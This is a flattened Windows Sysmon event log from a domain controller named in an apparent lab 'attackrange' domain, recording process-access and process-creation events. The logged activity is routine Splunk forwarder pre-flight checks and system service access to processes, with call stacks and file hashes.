13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E59-6005-4700-00000000A301}39563960C:\Windows\system32\cmd.exe{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000001855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.101{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8E59-6005-4700-00000000A301}3956C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000001854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4700-00000000A301}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4700-00000000A301}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E59-6005-4700-00000000A301}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E59-6005-4700-00000000A301}3956C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.048{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.017{59A5CD1D-8E58-6005-4600-00000000A301}39323936C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5A-6005-5100-00000000A301}3640C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.908{59A5CD1D-8E5A-6005-5100-00000000A301}36403628C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.673{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5A-6005-5100-00000000A301}3640C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
